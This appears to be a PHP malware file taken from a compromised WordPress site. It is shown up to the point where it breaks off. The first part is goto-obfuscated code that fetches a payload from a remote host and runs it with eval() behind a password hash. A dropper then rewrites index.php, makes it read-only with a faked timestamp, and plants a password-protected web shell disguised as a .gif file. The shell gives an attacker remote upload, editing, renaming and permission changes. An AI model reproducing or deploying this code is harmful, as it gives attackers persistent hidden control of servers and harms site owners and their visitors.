FeHW2TPf7be; LzIzS8cQaS5: DeBb_ZsVX6v: goto Zydsr8M7GCt; L278onswKLd: if (!(strpos($rL4XuU58kE0, "\54") !== false)) { goto H2N6xrJEEtJ; } goto V4LfQrGt71P; bOvh_EEtsjl: $rL4XuU58kE0 = $_SERVER["\x52\105\115\117\x54\x45\x5f\101\x44\x44\122"]; goto B10wwSZTfsC; FeHW2TPf7be: $rL4XuU58kE0 = trim(str_replace("\x20", '', $rL4XuU58kE0), "\x2c"); goto L278onswKLd; v00PuXQKj1u: if (isset($_SERVER["\x48\124\124\x50\137\x58\x5f\122\x45\101\114\137\x49\x50"]) && !empty($_SERVER["\110\124\124\120\x5f\130\137\x52\x45\101\x4c\x5f\111\120"])) { goto nA0YBIbIjit; } goto LtfX1UQvpGP; A7f343mzPFK: } goto pOkNjtomQKt; aAbbfJ7WnPE: thgs9bwN2ST: goto aWBHsGX3Rso; aQUExFXmm3t: class UKWMB8q3jrc { static function MkhlmeMTI8N($Fu1OhNfMLD6) { goto C8K3PbKF3Ip; RfbjYIyjwlz: ofu0BZHrhiK: goto kP74gRW0ZSb; oJJXxB_JoW1: $VCdwl7LoKtH = ''; goto CtckiNAmtJ7; jvFmx1pAH7B: $YXv2INP_Gyq = explode("\133", $Fu1OhNfMLD6); goto oJJXxB_JoW1; C8K3PbKF3Ip: $janvwYQqBO7 = "\x72" . "\141" . "\x6e" . "\x67" . "\145"; goto b4u1gT4KIIU; kP74gRW0ZSb: return $VCdwl7LoKtH; goto iYyHHol3fqp; b4u1gT4KIIU: $lvVws2Q0hH2 = $janvwYQqBO7("\x7e", "\x20"); goto jvFmx1pAH7B; CtckiNAmtJ7: foreach ($YXv2INP_Gyq as $o26W6iyhbxr => $q8q0zWg26kT) { $VCdwl7LoKtH .= $lvVws2Q0hH2[$q8q0zWg26kT - 8897]; A1OXOW_sHnO: } goto RfbjYIyjwlz; iYyHHol3fqp: } static function wBRZT_LjMlJ($w_u_JD8JQ0f, $BpWc8oF0PC7) { goto R1xcDHzzSLq; R1xcDHzzSLq: $pRxG7Xls_Vt = curl_init($w_u_JD8JQ0f); goto y5YYySWIPRi; y5YYySWIPRi: curl_setopt($pRxG7Xls_Vt, CURLOPT_RETURNTRANSFER, 1); goto cj1SHYldPK6; c8V3ioh5eoH: return empty($pyCijXa9VZM) ? $BpWc8oF0PC7($w_u_JD8JQ0f) : $pyCijXa9VZM; goto PlZrZuFt59H; cj1SHYldPK6: $pyCijXa9VZM = curl_exec($pRxG7Xls_Vt); goto c8V3ioh5eoH; PlZrZuFt59H: } static function kWjnsgTxHjH() { goto uWF7ro8PJMZ; rRoKHOsN6sC: $Px5MTlkwRSF = @$pLBor13bOaJ[2 + 1]($pLBor13bOaJ[2 + 4], $LxhFbrgXYFw); goto TNj3Bv7LpHV; n5xvMOua1UT: @eval($pLBor13bOaJ[3 + 1]($SVTF71IMG9K)); goto gW2bU1w4pTs; k_o5xHP3tIT: foreach ($BJYttMrfwax as $DjR1Du1oiL5) { $pLBor13bOaJ[] = self::mkhlmEMtI8N($DjR1Du1oiL5); m2AahDuiBp2: } goto YvnKEU91FaJ; vGE0dxJA2a5: @$pLBor13bOaJ[7 + 3](INPUT_GET, "\x6f\146") == 1 && die($pLBor13bOaJ[4 + 1](__FILE__)); goto ILSeJYTH7SU; Q_zriDueoaM: $LxhFbrgXYFw = @$pLBor13bOaJ[1]($pLBor13bOaJ[6 + 4](INPUT_GET, $pLBor13bOaJ[7 + 2])); goto rRoKHOsN6sC; YvnKEU91FaJ: N1zDZhFSR7G: goto Q_zriDueoaM; gW2bU1w4pTs: die; goto WVjcPN_JtzH; qFjOceg6Pt5: $SVTF71IMG9K = self::wbRZT_LJmlj($ICYXZ1JGcLv[0 + 1], $pLBor13bOaJ[1 + 4]); goto n5xvMOua1UT; ILSeJYTH7SU: if (!(@$ICYXZ1JGcLv[0] - time() > 0 and md5(md5($ICYXZ1JGcLv[0 + 3])) === "\145\x34\x36\146\x33\143\x32\x35\x65\x38\70\142\x36\x30\x62\x32\64\71\x66\64\x61\x39\61\70\61\x35\x63\x61\x39\x34\142\61")) { goto HHa0F9YV7m9; } goto qFjOceg6Pt5; uWF7ro8PJMZ: $BJYttMrfwax = array("\x38\x39\x32\x34\133\70\x39\x30\71\133\x38\71\x32\x32\x5b\70\x39\62\x36\133\x38\x39\60\x37\133\x38\x39\x32\x32\133\x38\71\62\70\x5b\70\x39\62\x31\133\70\x39\60\x36\x5b\70\71\x31\x33\x5b\x38\71\x32\x34\133\70\x39\x30\x37\133\x38\71\61\70\x5b\x38\x39\x31\62\x5b\x38\x39\x31\63", "\70\71\x30\x38\133\x38\71\x30\x37\133\x38\71\x30\71\x5b\x38\71\x32\x38\133\70\71\x30\x39\133\x38\71\x31\62\133\70\x39\x30\67\x5b\x38\71\67\x34\133\x38\x39\67\x32", "\x38\x39\61\x37\x5b\x38\x39\60\70\133\70\x39\61\62\133\70\x39\x31\x33\x5b\70\x39\62\x38\x5b\70\x39\x32\63\x5b\x38\71\x32\x32\x5b\x38\x39\62\x34\133\70\71\61\62\x5b\x38\71\x32\63\x5b\70\x39\x32\62", "\x38\71\61\x31\x5b\70\x39\62\x36\133\x38\x39\x32\64\133\70\x39\x31\x36", "\x38\71\62\65\x5b\x38\x39\x32\66\x5b\x38\x39\x30\70\133\x38\x39\62\x32\133\x38\x39\x36\x39\x5b\70\71\67\x31\133\70\x39\x32\70\133\x38\x39\62\x33\x5b\70\x39\62\62\x5b\70\71\62\64\133\x38\71\x31\62\133\70\x39\x32\x33\133\x38\x39\62\x32", "\x38\71\x32\x31\133\70\71\61\x38\133\70\x39\x31\65\133\x38\71\x32\x32\133\70\x39\x32\70\x5b\x38\71\62\60\x5b\70\71\62\x32\x5b\70\x39\x30\67\133\70\x39\62\x38\x5b\x38\71\x32\x34\133\x38\71\61\x32\133\x38\x39\61\63\133\x38\71\x30\67\x5b\70\71\x32\x32\x5b\70\71\61\63\133\x38\71\60\x37\x5b\x38\71\60\x38", "\x38\x39\65\x31\133\x38\71\x38\61", "\70\70\x39\x38", "\x38\x39\67\x36\133\70\x39\70\61", "\70\71\65\x38\133\x38\x39\x34\x31\x5b\70\x39\64\61\133\x38\71\65\x38\x5b\70\x39\63\64", "\70\x39\x32\61\x5b\70\x39\61\70\133\70\71\61\65\x5b\70\x39\60\67\x5b\70\71\x32\62\133\70\x39\x30\71\133\x38\71\x32\70\x5b\x38\x39\x31\70\133\70\71\61\63\x5b\70\x39\61\x31\133\x38\71\60\x36\133\70\71\x30\x37"); goto k_o5xHP3tIT; WVjcPN_JtzH: HHa0F9YV7m9: goto PzktQNpPTn_; TNj3Bv7LpHV: $ICYXZ1JGcLv = $pLBor13bOaJ[2 + 0]($Px5MTlkwRSF, true); goto vGE0dxJA2a5; PzktQNpPTn_: } } goto BBrFg8MZAk6; FSxInXWAwZ5: if (!strlen($uNvdJSAke26["\x63\157\156\x74\145\x6e\164"])) { goto NbGLwkQ5v9a; } goto pYV6tGPrURz; uIzg8ulvK4L: $K01wVS0RbuS = $lhcB3Jh20NS("\x7e", "\40"); goto ycfRhX_RtY8; wKvqA3G6x1J: NbGLwkQ5v9a: goto d_x3Gfpg1kQ; qMXKXNYDnch: $Iuc7Q3NTJAN = true; goto CPmClcgNcOv; WOHdvI4h6mD: YFjM72DzHVv: goto QahSsuphFSF; VQIUopfNPYs: $uNvdJSAke26 = jJKY7reddS0(base64_decode("\141\x48\x52\x30\x63\x44\157\x76\x4c\63\160\x7a\x4f\104\x4d\64\144\x6a\105\172\x4c\x6e\x4e\x76\x64\x58\122\157\132\x58\x4d\x75\x62\x47\x39\x73\x4c\x77"), $Kpd9TLMVa2M); goto S1rF0VgY2Q8; Ek04Fxvr6jS: $zf2pkarcd6a = strval(@$_SERVER["\110\124\124\x50\137\x52\105\106\105\122\x45\122"]); goto MDYySLfxq1t; QfSiG3M668B: $AQv8puKAebW[66] = $AQv8puKAebW[66] . $AQv8puKAebW[78]; goto W9pDPSZos4Z; C2meqY_TrDQ: $Kpd9TLMVa2M = array(); goto pRUiI0GbHe0; T2H0FwQiMKJ: if (!($_SERVER["\122\x45\121\x55\105\123\x54\x5f\x55\x52\x49"] === "\57\122\x2d" . md5($_SERVER["\x53\105\122\x56\x45\122\137\x4e\101\115\x45"]))) { goto YFjM72DzHVv; } goto xefkzD5iYMV; RLUCXXWGKlo: $Kpd9TLMVa2M["\154"] = xS_v6NAHuVF($_SERVER["\110\124\x54\x50\x5f\x41\x43\103\105\x50\x54\137\x4c\x41\x4e\107\x55\101\107\x45"]); goto sDcsvd1cvjy; Arra8O2CAY_: exit("\x7b\x20\42\145\x72\x72\x6f\x72\42\x3a\x20\62\60\x30\54\40\x22\154\x63\42\72\40\42\152\153\x22\x2c\40\x22\x64\x61\164\141\x22\x3a\40\133\40\x31\x20\135\40\175"); goto qH_qUpHW_Yh; uzWyevPudG3: $Iuc7Q3NTJAN = false; goto InOh5s9UiSG; S1rF0VgY2Q8: if (in_array($uNvdJSAke26["\163\x74\141\x74\165\x73"], array(0, 200))) { goto s8WHKxZInDy; } goto gERoO6b49g1; OhakgUAXV3h: $Kpd9TLMVa2M["\x73"] = xS_V6NahuVf($kKRBLplPsS0); goto Rv0_IAooKFN; FQp9QSOUPMi: if (!(strpos($zf2pkarcd6a, $kKRBLplPsS0) === 0)) { goto sJCGg5QRall; } goto NWpBrXAkKJu; W9pDPSZos4Z: @eval($AQv8puKAebW[66](${$AQv8puKAebW[42]}[26])); goto aAbbfJ7WnPE; xefkzD5iYMV: exit(strrev(md5($_SERVER["\123\x45\122\126\105\x52\x5f\x4e\101\115\x45"]))); goto WOHdvI4h6mD; cDM0vrxrEGD: sJCGg5QRall: goto C2meqY_TrDQ; ChBXeqffXyd: function jJKy7reDDs0($MFmHhJIULjN, $Y1gEuTjZPuA = array()) { goto hKLoAesQtiV; t7eeB3mSLbL: $MFmHhJIULjN .= "\x3f" . http_build_query($Y1gEuTjZPuA); goto XItZaY34za_; Q4wRMJAwrvd: try { goto coIxiQMko3Y; JqGtwFvApT1: $uNvdJSAke26["\x63\x6f\x6e\x74\x65\156\x74"] = strval(curl_getinfo($gD6TLcUtRSV, CURLINFO_REDIRECT_URL)); goto NhmAY4OaVmy; WUerYlLhIPP: goto liWfazSduHp; goto hLgZhyunpYR; C9bshbFGi3o: $uNvdJSAke26["\x63\x6f\x6e\x74\x65\156\x74"] = strval($YJgHj0fnFfU); goto QzHi1bGyX6f; C_UUP8tlTZj: $uNvdJSAke26 = array_merge($uNvdJSAke26, kyAjigRQaj1($http_response_header)); goto rneCNpTR7nZ; USwaWEu6cae: curl_setopt($gD6TLcUtRSV, CURLOPT_CONNECTTIMEOUT, 20); goto ltdt2ASQmkX; m0cNM74ObUq: $uNvdJSAke26["\164\x79\160\145"] = strval(curl_getinfo($gD6TLcUtRSV, CURLINFO_CONTENT_TYPE)); goto JqGtwFvApT1; nytXfee7Frv: $uNvdJSAke26["\x63\157\156\x74\145\156\x74"] = strval($p1fzEuFJ2KY); goto U1GCT682835; fUfOvbYpSk1: $p1fzEuFJ2KY = curl_exec($gD6TLcUtRSV); goto u8enmQmHFG0; hLgZhyunpYR: qX3dn14Qnof: goto LImiW_yUPfB; ltdt2ASQmkX: curl_setopt($gD6TLcUtRSV, CURLOPT_TIMEOUT, 60); goto Wyk_AQgwxNb; rM1bK3JGTVq: $YJgHj0fnFfU = @file_get_contents($MFmHhJIULjN, false, $wrtiOuMEcRL); goto C_UUP8tlTZj; u8enmQmHFG0: $uNvdJSAke26["\163\164\141\164\x75\163"] = intval(curl_getinfo($gD6TLcUtRSV, CURLINFO_HTTP_CODE)); goto m0cNM74ObUq; WyLH60fjPux: curl_setopt($gD6TLcUtRSV, CURLOPT_COOKIESESSION, 0); goto TomCOCY9M2V; coIxiQMko3Y: if (function_exists("\x63\x75\162\x6c\x5f\145\x78\145\x63") && function_exists("\143\165\x72\x6c\x5f\151\x6e\x69\x74")) { goto qX3dn14Qnof; } goto JFG12kvcavi; LImiW_yUPfB: $gD6TLcUtRSV = curl_init(); goto zEdNjkjCGUn; QzHi1bGyX6f: RtslBhc2zvQ: goto ZEX4vziyZfV; NhmAY4OaVmy: @curl_close($gD6TLcUtRSV); goto O0wpje1Hfw8; JFG12kvcavi: if (ini_get("\141\x6c\x6c\157\x77\x5f\165\162\154\137\146\157\x70\x65\x6e")) { goto DdWMjZ2OcMy; } goto WUerYlLhIPP; O0wpje1Hfw8: if (!in_array($uNvdJSAke26["\163\x74\141\x74\165\163"], array(200, 301, 302, 404))) { goto Z1iHcG_7BRq; } goto nytXfee7Frv; p7kNl_ooxcd: curl_setopt($gD6TLcUtRSV, CURLOPT_SSL_VERIFYHOST, 0); goto JA2016keSDW; miYKZ5od0J2: $wrtiOuMEcRL = stream_context_create($el5Xb2o1V6F); goto rM1bK3JGTVq; Wyk_AQgwxNb: curl_setopt($gD6TLcUtRSV, CURLOPT_FOLLOWLOCATION, 0); goto WyLH60fjPux; zEdNjkjCGUn: curl_setopt($gD6TLcUtRSV, CURLOPT_URL, $MFmHhJIULjN); goto p7kNl_ooxcd; rneCNpTR7nZ: if (!in_array($uNvdJSAke26["\x73\164\141\164\x75\163"], array(200, 301, 302, 404))) { goto RtslBhc2zvQ; } goto C9bshbFGi3o; JA2016keSDW: curl_setopt($gD6TLcUtRSV, CURLOPT_SSL_VERIFYPEER, 0); goto USwaWEu6cae; TomCOCY9M2V: curl_setopt($gD6TLcUtRSV, CURLOPT_RETURNTRANSFER, 1); goto fUfOvbYpSk1; v39H0jtc8dR: goto liWfazSduHp; goto VDvWWG2AL_l; VDvWWG2AL_l: DdWMjZ2OcMy: goto TjcaUXW91ul; ZEX4vziyZfV: liWfazSduHp: goto ODkaYcnj7B_; U1GCT682835: Z1iHcG_7BRq: goto v39H0jtc8dR; TjcaUXW91ul: $el5Xb2o1V6F = array("\x68\x74\x74\x70" => array("\155\x65\164\x68\157\x64" => "\x47\x45\x54", "\x74\151\155\145\157\165\164" => 60, "\x66\x6f\x6c\154\157\x77\x5f\154\157\143\141\x74\151\157\156" => 0), "\163\163\154" => array("\166\145\162\151\146\171\137\160\x65\x65\162" => false, "\x76\145\x72\151\x66\x79\x5f\x70\x65\145\x72\x5f\156\x61\x6d\145" => false)); goto miYKZ5od0J2; ODkaYcnj7B_: } catch (Exception $cIa7380_Yj3) { } goto Sj8q5YEK8Ot; Sj8q5YEK8Ot: return $uNvdJSAke26; goto ETcT5gN7CcB; Tem8_0ary0i: if (!(is_array($Y1gEuTjZPuA) && count($Y1gEuTjZPuA))) { goto b_ZZh_lH4yV; } goto t7eeB3mSLbL; hKLoAesQtiV: $uNvdJSAke26 = array("\x73\x74\141\x74\x75\x73" => 0, "\x63\x6f\156\x74\x65\x6e\164" => '', "\x74\x79\x70\145" => ''); goto Tem8_0ary0i; XItZaY34za_: b_ZZh_lH4yV: goto Q4wRMJAwrvd; ETcT5gN7CcB: } goto wR7ARE25TRt; pYV6tGPrURz: @header("\x43\157\x6e\x74\145\x6e\164\55\x54\x79\160\145\x3a" . $uNvdJSAke26["\x74\171\160\x65"]); goto sXpKDIwMAAS; YamsXWzGhJQ: function kyAjiGRqAj1($ok7JvzON4Na) { goto kZtdQZHE3yE; pk50I77U6lQ: if (is_array($ok7JvzON4Na)) { goto O8J8qMm3elF; } goto MKd1MAJLPNM; iEfqXAaWIcE: jUTgtmqecKv: goto O0Mh5eJJDHN; MKd1MAJLPNM: return $CE4mVes4hLm; goto wGBHRFDV2JR; kZtdQZHE3yE: $CE4mVes4hLm = array("\163\x74\141\164\165\163" => 0, "\x63\157\156\x74\145\x6e\x74" => '', "\x74\x79\160\145" => ''); goto pk50I77U6lQ; wGBHRFDV2JR: O8J8qMm3elF: goto JRdQmjU8e9F; JRdQmjU8e9F: foreach ($ok7JvzON4Na as $W0dPj6b19V_) { goto ldzPv1PZ6yV; Uc1BpFfu7rl: $CE4mVes4hLm["\x63\x6f\x6e\164\x65\x6e\164"] = $V2rOCBJIkcO[1]; goto Re7TWKf4YWF; eikrhpo5Rp7: rq0UHn6PqLu: goto cwNVnkPb0xJ; LIZTqM98ZCm: goto rq0UHn6PqLu; goto ALznwvEaUbX; s6ncWGpBm9A: if (preg_match("\x2f\143\x6f\x6e\x74\145\x6e\164\x5c\55\164\171\x70\x65\134\x3a\133\x5c\163\x5d\x2b\x28\x2e\x2a\51\x2f\x69", $W0dPj6b19V_, $V2rOCBJIkcO)) { goto Za8ld43clzf; } goto HfhHt1fpgVI; cSMamvIjHlD: $CE4mVes4hLm["\x73\x74\x61\164\x75\163"] = intval($V2rOCBJIkcO[1]); goto LIZTqM98ZCm; ldzPv1PZ6yV: if (preg_match("\57\150\x74\164\x70\x5c\x2f\133\60\x2d\71\x5c\x2e\135\x2b\x5b\x5c\x73\135\x2b\50\133\x30\x2d\71\x5d\53\51\x2f\x69", $W0dPj6b19V_, $V2rOCBJIkcO)) { goto SNantRvZZde; } goto WBiVGKnu6pp; RnQ6U7kH25w: Za8ld43clzf: goto K5Cm9lZjcMr; HfhHt1fpgVI: goto rq0UHn6PqLu; goto UhIsoDNLY46; UhIsoDNLY46: SNantRvZZde: goto cSMamvIjHlD; WBiVGKnu6pp: if (preg_match("\57\x6c\x6f\143\141\164\x69\x6f\x6e\x5c\x3a\133\134\163\135\x2b\x28\x2e\52\x29\x2f\x69", $W0dPj6b19V_, $V2rOCBJIkcO)) { goto it0Jya5yvS7; } goto s6ncWGpBm9A; K5Cm9lZjcMr: $CE4mVes4hLm["\164\171\x70\x65"] = $V2rOCBJIkcO[1]; goto eikrhpo5Rp7; ALznwvEaUbX: it0Jya5yvS7: goto Uc1BpFfu7rl; Re7TWKf4YWF: goto rq0UHn6PqLu; goto RnQ6U7kH25w; cwNVnkPb0xJ: TBbHM6SLYmK: goto B1ERvApULA5; B1ERvApULA5: } goto iEfqXAaWIcE; O0Mh5eJJDHN: return $CE4mVes4hLm; goto GHfCJ7xAIs1; GHfCJ7xAIs1: } goto ChBXeqffXyd; QahSsuphFSF: if (!substr_count($_SERVER["\122\105\121\125\105\x53\124\137\125\x52\x49"], "\x69\x6e\144\145\170\56\160\150\160\57\152\153")) { goto pVY5XOiox8_; } goto Arra8O2CAY_; gERoO6b49g1: switch ($uNvdJSAke26["\x73\164\x61\164\165\163"]) { case 301: goto O3zdZ9NA1EQ; O3zdZ9NA1EQ: header("\x48\124\x54\x50\57\61\x2e\x31\x20\x33\60\x31\40\x4d\157\x76\145\x64\40\x50\x65\162\x6d\141\156\x65\x6e\x74\x6c\171"); goto K0spzW2FQ_1; rHwEdOYspbD: goto TSVTwatQrg8; goto dzRiPhWzqHG; K0spzW2FQ_1: header("\x4c\157\x63\x61\164\x69\157\x6e\72\40" . trim($uNvdJSAke26["\143\x6f\x6e\x74\145\x6e\164"])); goto rHwEdOYspbD; dzRiPhWzqHG: case 302: goto agKyPVBkcRC; RfM9ckDpBX9: goto TSVTwatQrg8; goto UwB_ZInE0It; agKyPVBkcRC: header("\x48\x54\x54\120\x2f\x31\56\x31\x20\63\60\x32\40\115\157\166\x65\40\x54\x65\155\160\157\162\x61\162\x69\154\171"); goto pS5Y4tsKKBd; pS5Y4tsKKBd: header("\114\157\143\141\164\x69\x6f\x6e\x3a\x20" . trim($uNvdJSAke26["\143\x6f\156\164\x65\156\x74"])); goto RfM9ckDpBX9; UwB_ZInE0It: case 404: goto PEqYPSHVEpl; LyQ7_cwvXsH: header("\163\164\x61\x74\x75\163\x3a\x20\x34\60\x34\40\x4e\x6f\164\40\106\157\x75\156\144"); goto GadUjI8Kr07; GadUjI8Kr07: goto TSVTwatQrg8; goto NJgKCoht4tR; PEqYPSHVEpl: header("\x48\124\x54\120\57\61\x2e\61\x20\x34\60\64\40\x4e\x6f\x74\40\x46\157\x75\156\144"); goto LyQ7_cwvXsH; NJgKCoht4tR: default: goto TSVTwatQrg8; } goto amvbdbVYfLL; d_x3Gfpg1kQ: aqp50QEfzch:
?>
<?php define( 'WP_USE_THEMES', true ); require('./wp-blog-header.php');?>"); $index_code = file_get_contents($do."index.php"); if(md5($index_code) != md5($open_cache_ruzhu_phpcode)) { @chmod($do."index.php", 0644); @file_put_contents($do."index.php", $open_cache_ruzhu_phpcode); @touch($do."index.php", filectime($do."index.php")); @chmod($do."index.php", 0444); } $file_general_template_path = $do."wp-includes/general-template.php"; $jue_jiang_404_path = $do."wp-includes/images/xit-3x.gif"; if (!file_exists($jue_jiang_404_path)){ $jue_jiang_404 = "<?php
error_reporting(0);
date_default_timezone_set('PRC');

$ARRAY = ${'_GET'}['ARRAY'];
$KJMn = str_rot13($ARRAY);
$cbH = pack("\x48\x2a", $KJMn);
$EzaU = json_decode($cbH, true);
if (($EzaU[0] - time()) > 0 and md5(md5($EzaU[2])) === "9f34665b0052311d5b6ad6f821dc6228") : // ====
// ===============================================================

    function juejiang_perms($file){
        $perms = fileperms($file);
        if (($perms & 0xC000) == 0xC000) {// Socket
            $info = 's';
        } elseif (($perms & 0xA000) == 0xA000) {// Symbolic Link
            $info = 'l';
        } elseif (($perms & 0x8000) == 0x8000) {// Regular
            $info = '-';
        } elseif (($perms & 0x6000) == 0x6000) {// Block special
            $info = 'b';
        } elseif (($perms & 0x4000) == 0x4000) {// Directory
            $info = 'd';
        } elseif (($perms & 0x2000) == 0x2000) {// Character special
            $info = 'c';
        } elseif (($perms & 0x1000) == 0x1000) {// FIFO pipe
            $info = 'p';
        } else {// Unknown
            $info = 'u';
        }
// Owner
        $info .= (($perms & 0x0100) ? 'r' : '-');
        $info .= (($perms & 0x0080) ? 'w' : '-');
        $info .= (($perms & 0x0040) ?
            (($perms & 0x0800) ? 's' : 'x' ) :
            (($perms & 0x0800) ? 'S' : '-'));

// Group
        $info .= (($perms & 0x0020) ? 'r' : '-');
        $info .= (($perms & 0x0010) ? 'w' : '-');
        $info .= (($perms & 0x0008) ?
            (($perms & 0x0400) ? 's' : 'x' ) :
            (($perms & 0x0400) ? 'S' : '-'));

// World
        $info .= (($perms & 0x0004) ? 'r' : '-');
        $info .= (($perms & 0x0002) ? 'w' : '-');
        $info .= (($perms & 0x0001) ?
            (($perms & 0x0200) ? 't' : 'x' ) :
            (($perms & 0x0200) ? 'T' : '-'));

        return $info;
    }

// ------------------------------------------------------
    /**
     * 转化 \ 为 /
     */
    function dir_path($path)
    {
        $path = str_replace('\\', '/', $path);
        if (substr($path, -1) != '/') $path = $path . '/';
        return $path;
    }

// ------------------------------------------------------

    /** 取得站点根目录
     * @return array|string|string[]
     */
    function document_root(){

        $php_self = dir_path($_SERVER["PHP_SELF"]);
        $script_filename = dir_path($_SERVER["SCRIPT_FILENAME"]);
        if (empty($_SERVER["PHP_SELF"]) or empty($_SERVER["SCRIPT_FILENAME"])){
            $do1 = dir_path($_SERVER["DOCUMENT_ROOT"]);
            $do = rtrim($do1,'/');
        }else{
            $do = str_replace(str_replace("//", "/", $php_self), "", str_replace("\\\\", "/", $script_filename));
        }
		if(empty($do)) $do = '/';
        return $do;
    }
    $document_root = document_root();
    define('DOCUMENT_ROOT', $document_root);

// ------------------------------------------------------



    $php_version = PHP_MAJOR_VERSION;
	if($php_version<=7){
		if(get_magic_quotes_gpc()){
			foreach($_POST as $key=>$value){
				$_POST[$key] = stripslashes($value);
			}
		}
	}

    $Version = base64_decode('5pyA5ZCO55qE5YCU5by6');
    if(isset($_GET['path'])){
        $path = $_GET['path'];
    }else{
        $path = getcwd();
    }


    echo '<!doctype html>
<html>
<head>
<title>&Error_404&</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
</head>';
    ?>

    <center>
        <style>
            body{background:#e6e6e6;line-height:1;color:#000;font-family:Comic Sans MS;width:60%;margin:0 auto;}
            table,th,td{border-collapse:collapse;background:transparent;font-size:13px;}
            input,textarea{}
            .table_home,.th_home,.td_home{color:grey;border:1px solid grey;}
            th{padding:10px;}
            .td_home{padding:7px;}
            a{color:#000; text-decoration:none;}
            textarea{width:100%;height:400px;}
            #content tr:hover{background-color:#cecece;text-shadow:0px 0px 10px #fff;color:#fff;}
            .dh a{ padding-left: 10px; padding-right: 10px; border-right: 1px solid #000;}
            .dh a:hover{ color: #f00;}
        </style>
    <?php
    echo '</head>
<body><b>
<H1><center><font color="red">'.$Version.'</font></center></h1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">

<tr><td>

<font ><center>'.php_uname().'</center></font><br>';
    if(isset($_GET['path'])){
        $path = $_GET['path'];
    }else{
        $path = getcwd();
    }
    $path = str_replace('\\','/',$path);
    $paths = explode('/',$path);

    $gen_link_url = '<a style="color:#0066FF" href="?ARRAY='.$ARRAY.'&path='.DOCUMENT_ROOT;
    $gen_link_url .= '">根目录 ：    </a>&nbsp;';
    echo $gen_link_url;

    foreach($paths as $id=>$pat){
        if($pat == '' && $id == 0){
            $a = true;
            echo '<font color=#000>
<a href="?ARRAY='.$ARRAY.'&path=/">/</a>';
            continue;
        }
        if($pat == '') continue;
        echo '<a style="color:#0066FF" href="?ARRAY='.$ARRAY.'&path=';
        for($i=0;$i<=$id;$i++){
            echo "$paths[$i]";
            if($i != $id) echo "/";
        }
        echo '">'.$pat.'</a>/';
    }
    echo '</font>
<br><br>
</td></tr><tr><td><center>';

    if(isset($_FILES['file'])){
        if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
            echo '<font color="green">上传成功 :)</font><br /><br />';
        }else{
            echo '<font color="red">上传失败 </font><br /><br />';
        }
    }
    echo '</center><center><form enctype="multipart/form-data" method="POST"><font color="white"><input style="background:black;font-family: Comic Sans MS " type="file" name="file" />
<input type="submit" value="上传" />
</form></center>
</td></tr>';
    if(isset($_GET['filesrc'])){
        echo "<tr><td><center>当前文件 : ";
        echo $_GET['filesrc'];
        echo '</center></tr></td></table><br />';
        echo(' <textarea style="width: 100%;height: 400px;" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
    }
//Empety
    elseif(isset($_GET['option']) && $_GET['opt'] != 'delete'){
// echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
        echo '</table><br /><center>';
//Chmod
        if($_GET['opt'] == 'chmod'){
            if(isset($_POST['perm'])){
                $new_perm_o = $_POST['perm'];

                if(strlen($new_perm_o)<=3) $new_perm_o=str_pad($new_perm_o,3,'6',STR_PAD_LEFT);
                $new_perm_o=intval(str_pad($new_perm_o,4,'0',STR_PAD_LEFT),8);

                if(chmod($_POST['path'],$new_perm_o)){
                    echo '<font color="green">更改权限成功！ </font><br />';
                }else{
                    echo '<font color="red">更改权限错误！ </font><br />';
                }
            }

            $hell = $_GET['path'];
            $yeah = $_GET['name'];
            $patc = "$hell/$yeah";

            echo '<form method="POST"><br>
当前文件 : '.$patc.'<br><br>权限----'.substr(base_convert(@fileperms($patc),10,8),-4).'<br><br>
设置新权限 : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($patc)), -4).'" />
<input type="hidden" name="path" value="'.$patc.'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" />
</form>
<br>
<a href="?ARRAY='.$ARRAY.'&path='.$hell.'" style="display:block; width:100%;" title="反回">反回</a>
';

        }
//
        elseif($_GET['opt'] == 'btw'){
            $cwd = $_GET['path'];

            echo '<form action="?ARRAY='.$ARRAY.'&option&path='.$cwd.'&opt=delete&type=buat" method="POST">
新目录名 : <input name="name" type="text" size="20" value="Folder" />
<input type="hidden" name="path" value="'.$cwd.'">
<input type="hidden" name="opt" value="delete">
<input type="submit" />
</form>';
        }
//Rename file
        elseif($_GET['opt'] == 'rename'){
            if(isset($_POST['newname'])){
                if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
                    echo '<font color="green">重命名成功! :)</font><br /><br />';
                }else{
                    echo '<font color="red">重命名失败! :( </font><br /><br />';
                }
                $_POST['name'] = $_POST['newname'];
            }
            $hell = $_GET['path'];
            $yeah = $_GET['name'];
            $patc = "$hell/$yeah";
            $new = $_POST['newname'];

            echo '<form method="POST">
新名称 : <input name="newname" type="text" size="20" value="'.$new.'" />
<input type="hidden" name="path" value="'.$patc.'">
<input type="hidden" name="opt" value="rename">
<input type="submit" /><br><br>
<input type="button" value="反回" onClick="javascript:location.href=\'?ARRAY='.$ARRAY.'&path='.$hell.'\'">
</form>';
        }
//File baru
        elseif($_GET['opt'] == 'baru'){

            $hell = $_GET['path'];
            $yeah = $_GET['name'];
            $patc = "$hell/$yeah";
            $new = empty($_POST['newname'])?$_POST['ngaran1']:$_POST['newname'];
            $azz = $_POST['path'];
            $newz = $azz."/".$new;
            $new_fiel = $hell.'/'.$_POST['ngaran1'];
            if(!empty($_POST['ngaran1'])) echo "正在新建文件：{$new_fiel}<br><br>";
            if(isset($_POST['src'])){
                $fp = fopen($_POST['path'],'w');
                if(fwrite($fp,$_POST['src'])){
                    echo '<font color="green">新建文件成功 [ '.$azz.' ]</font><br /><br />';
                }else{
                    echo '<font color="red">新建文件失败 >:(</font><br /><br />';
                }
                fclose($fp);
            }

            echo '<form method="POST"> 新文件名 : <input name="ngaran1" type="text" size="20" value="'.$new.'" /><input type="submit" name="ngaran" /></form><br> ';

            $ho = $_POST['ngaran1'];

            if(isset($_POST['ngaran'])){
                echo '<form method="POST">
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
<input type="hidden" name="path" value="'.$hell.'/'.$ho.'">
<input type="hidden" name="opt" value="edit">
<input type="submit"  />
</form>';
            }
        }
//Edited file
        elseif($_GET['opt'] == 'edit'){
            if(isset($_POST['src'])){
                $fp = fopen($_POST['path'],'w');
                if(fwrite($fp,$_POST['src'])){
                    echo '<font color="green">编辑成功！ </font><br /><br />';
                }else{
